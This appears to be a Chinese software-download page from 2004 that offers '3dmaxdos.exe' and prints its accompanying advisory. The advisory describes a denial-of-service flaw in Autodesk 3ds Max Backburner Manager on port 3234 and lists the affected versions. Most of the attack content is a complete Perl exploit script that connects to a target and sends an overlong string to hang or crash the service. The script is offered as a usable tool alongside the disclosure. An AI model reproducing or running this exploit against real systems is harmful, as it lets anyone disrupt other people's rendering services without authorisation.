| 软件名称: |
3dmaxdos.exe |
| 文件类型: |
|
|
| 界面语言: |
简体中文 |
| 软件类型: |
国产软件 |
| 运行环境: |
WinNT/2K/Xp |
| 授权方式: |
共享软件 |
| 软件大小: |
542K |
| 软件等级: |
★★★★☆ |
| 发布时间: |
2004-10-24 |
| 官方网址: |
http://www.Xtiger.net&www. 作者:X-tiger |
| 演示网址: |
|
| 软件说明: |
|
3Dmax backburner Manager Dos Exploit
漏洞发现:tiger
测试代码:tiger
来 源:www.Xtiger.net&www.ThySea.com
发布日期:2004-10-20
受影响版本:
3dmax 5.0 backburner Manager Version 2.0
3dmax 6.0 backburner Manager Version 2.2
3dmax 6.0 SP1 backburner Manager Version 2.2
--------------------------------------------------------------------------------
3Dmax backburner Manager是AUTODESK公司出品的著名图形和动画设计软件3DMAX的网络组件,用于网络协作进行渲染等操作。此组件作为服务形式监听在3234端口,存在DOS攻击缺陷,发送超长字符会导致服务挂起.分为以GUI界面的manager.exe和注册为系统服务的managersvc.exe两种方式.
以下是存在的问题:
1、manager.exe
连接服务端3234端口后,发送超过228个字符后会导致系统CPU使用率达到100%极大的耗用资源并无法进行正常服务,超过230个字符会使manager.exe停止服务(WRN General exception handled in TCP Thread),以上都会导致不能TCP连接。在发送达到2364的时候程序会直接退出!日志中没有记录任何信息(当然Socket连接还是记录了).
2、注册为系统服务的managersvc.exe
连接服务端3234端口后,发送超过2364个字符会导致目标主机3Dmax backburner Manager服务挂起,程序直接退出,日志中也不会有任何的记录。
以下是测试代码:
############################################################
#!C:\perl\bin\perl.exe
use IO::Socket;
my $progname = $0;
$progname =~ s,.'*/,,;
$progname =~ s/\.\w*$//;
$host = shift || 'localhost'; #目标主机地址
$port = shift || '3234'; #3Dmax backburner Manager默认监听在3234端口
$title = " =============================================\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\n =============================================\n BY tiger---www.xtiger.net&www.thysea.com\n";
$Usage = " Usage: $progname [Host] [port](default is 3234)\n";
if ($host > 0){ #判断输入数据
dos();
}
else {
usage();
}
sub dos #DOS攻击
{
my $socket = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
) #建立socket连接
or print "$title [*] ERR-->can't connect to $host:$port! :(\n" and exit;
print ($title, "[*] connected to $host:$port\n");
print "[*] Sending string...\n";
print $socket ("?"x(2364),"\r\n") or die "$title [*] ERR-->Sending string failed! :(\n";#发送超长字符
print "[*] maybe crashed!\n";
$socket->close;#关闭socket连接
}
sub usage #帮助信息
{
die $title,$Usage;
}
#######################################################
在3DMAX5的时候就有这个问题了,但到了3DMAX6,问题依然存在.看来AUTODESK公司并没注意到这个缺陷.
不知道有没有Overflow,这就让某些牛人来做了.本人水平暂时就到这儿了。意见和建议可以到www.Xtiger.net,本人陋站和www.thysea.com反应和交流.谢谢! |
|
| 下载地址: |
进入下载地址列表
|
| 下载说明: |
☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。 |
|
[ 推荐]
[ 评论(0条)] [返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
